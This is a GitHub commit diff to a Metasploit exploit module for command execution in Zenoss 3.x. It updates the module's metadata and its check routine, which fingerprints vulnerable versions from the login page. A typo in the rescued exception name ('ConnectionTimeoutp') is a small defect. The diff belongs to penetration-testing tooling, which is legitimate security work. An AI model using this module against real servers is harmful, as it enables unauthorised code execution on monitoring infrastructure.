Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with
or
.
Download ZIP
Browse files

minor improvements to Zenoss showdaemonxmlconfig exploit

  • Loading branch information...
commit 2bf0899d09e6b4fd9401bc28929190485272cb2d 1 parent bdf8f1a
@bcoles bcoles authored
View
31 .../zenoss_3.2.1_showdaemonxmlconfig_exec.rb → ...x/http/zenoss_showdaemonxmlconfig_exec.rb
@@ -6,7 +6,6 @@
##
require 'msf/core'
-require 'msf/core/handler/reverse_tcp'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
@@ -15,9 +14,9 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
- 'Name' => 'Zenoss <= 3.2.1 showDaemonXMLConfig Command Execution',
+ 'Name' => 'Zenoss 3 showDaemonXMLConfig Command Execution',
'Description' => %q{
- This module exploits a command execution vulnerability in Zenoss <= 3.2.1
+ This module exploits a command execution vulnerability in Zenoss 3.x
which could be abused to allow authenticated users to execute arbitrary
code under the context of the 'zenoss' user. The show_daemon_xml_configs()
function in the 'ZenossInfo.py' script calls Popen() with user
@@ -31,10 +30,10 @@ def initialize(info = {})
],
'Author' =>
[
- 'Brendan Coles <bcoles[at]gmail[dot]com>', # Discovery and exploit
+ 'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
],
'License' => MSF_LICENSE,
- 'Version' => '$Revision: 2 $',
+ 'Version' => '$Revision: 3 $',
'Privileged' => false,
'Arch' => ARCH_CMD,
'Platform' => 'unix',
@@ -68,15 +67,21 @@ def initialize(info = {})
def check
+ @peer = "#{rhost}:#{rport}"
+
# retrieve software version from login page
- res = send_request_raw({
- 'method' => "GET",
- 'uri' => "/zport/acl_users/cookieAuthHelper/login_form"
- })
- return Exploit::CheckCode::Unknown if res.nil?
- return Exploit::CheckCode::Vulnerable if res.body =~ /<p>Copyright &copy; 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+<span>3\.2\.1<\/span>/
- return Exploit::CheckCode::Detected if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/
- return Exploit::CheckCode::Safe
+ begin
+ res = send_request_raw({
+ 'method' => "GET",
+ 'uri' => "/zport/acl_users/cookieAuthHelper/login_form"
+ })
+ return Exploit::CheckCode::Vulnerable if res.body =~ /<p>Copyright &copy; 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+<span>3\./
+ return Exploit::CheckCode::Detected if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/
+ return Exploit::CheckCode::Safe
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
+ print_error("#{@peer} - Connection failed")
+ end
+ return Exploit::CheckCode::Unknown
end
Please sign in to comment.
Something went wrong with that request. Please try again.